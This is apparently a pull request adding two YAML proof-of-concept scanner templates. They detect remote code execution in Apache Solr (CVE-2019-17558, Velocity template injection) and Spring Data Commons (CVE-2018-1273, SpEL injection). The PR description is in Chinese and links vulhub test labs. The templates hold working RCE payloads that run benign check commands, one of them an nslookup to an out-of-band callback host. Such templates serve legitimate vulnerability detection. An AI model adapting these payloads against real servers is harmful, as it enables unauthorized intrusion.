### PR TITLE
spring-cve-2018-1273

### DIFF
--- a/pocs/solr-cve-2019-17558.yml
+++ b/pocs/solr-cve-2019-17558.yml
@@ -2,7 +2,7 @@ name: poc-yaml-solr-cve-2019-17558
 set:
   r1: randomInt(40000, 44800)
   r2: randomInt(40000, 44800)
-rules: 
+rules:
   - method: GET
     path: "/solr/admin/cores?wt=json"
     follow_redirects: false

--- a/pocs/solr-cve-2019-17558.yml
+++ b/pocs/solr-cve-2019-17558.yml
@@ -1,0 +1,37 @@
+name: poc-yaml-solr-cve-2019-17558
+set:
+  r1: randomInt(40000, 44800)
+  r2: randomInt(40000, 44800)
+rules: 
+  - method: GET
+    path: "/solr/admin/cores?wt=json"
+    follow_redirects: false
+    expression: response.status == 200 && response.body.bcontains(b"responseHeader")
+    search: |
+      "name":"(?P<core>[^"]+)"
+  - method: POST
+    path: >-
+      /solr/{{core}}/config
+    headers:
+      Content-Type: application/json
+    body: |-
+      {
+        "update-queryresponsewriter": {
+          "startup": "test",
+          "name": "velocity",
+          "class": "solr.VelocityResponseWriter",
+          "template.base.dir": "",
+          "solr.resource.loader.enabled": "true",
+          "params.resource.loader.enabled": "true"
+        }
+      }
+    expression: response.status == 200
+  - method: GET
+    path: "/solr/{{core}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27expr%20{{r1}}%20*%20{{r2}}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end"
+    follow_redirects: false
+    expression: response.body.bcontains(bytes(string(r1 * r2)))
+detail:
+  author: Soveless(https://github.com/Soveless)
+  Affected Version: "Apache Solr - 5.0.0 < version < 8.3.1"
+  links:
+    - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2019-17558

--- a/pocs/spring-cve-2018-1273.yml
+++ b/pocs/spring-cve-2018-1273.yml
@@ -1,0 +1,19 @@
+name: poc-yaml-spring-cve-2018-1273
+set:
+  reverse: newReverse()
+  reverseDomain: reverse.domain
+  reverseIP: reverse.ip
+rules:
+  - method: POST
+    path: /users
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    body: >-
+      username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec('nslookup {{reverseDomain}} {{reverseIP}}')]=&password=&repeatedPassword=
+    expression: >
+      response.status == 500 && reverse.wait(5)
+detail:
+  author: Soveless(https://github.com/Soveless)
+  Affected Version: "Spring Data Commons < 2.0.5"
+  links:
+    - https://github.com/vulhub/vulhub/tree/master/spring/CVE-2018-1273


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
CVE-2018-1273
Spring Data Commons是Spring Data下所有子项目共享的基础框架。
Spring Data Commons 在2.0.5及以前版本中，存在SpEL表达式注入漏洞，漏洞导致RCE

CVE-2019-17558
5.0.0 到 8.3.1版本中，通过Velocity模板语言执行任意命令。

## 测试环境
https://github.com/vulhub/vulhub/tree/master/spring/CVE-2018-1273

https://github.com/vulhub/vulhub/tree/master/solr/CVE-2019-17558
## 备注
![cve-2018-1273](https://user-images.githubusercontent.com/60567763/81863550-46f25480-9520-11ea-94d6-54b51ca75409.JPG)

![CVE-2019-17558](https://user-images.githubusercontent.com/60567763/81876935-b1af8a00-9538-11ea-933d-810564df238e.JPG)

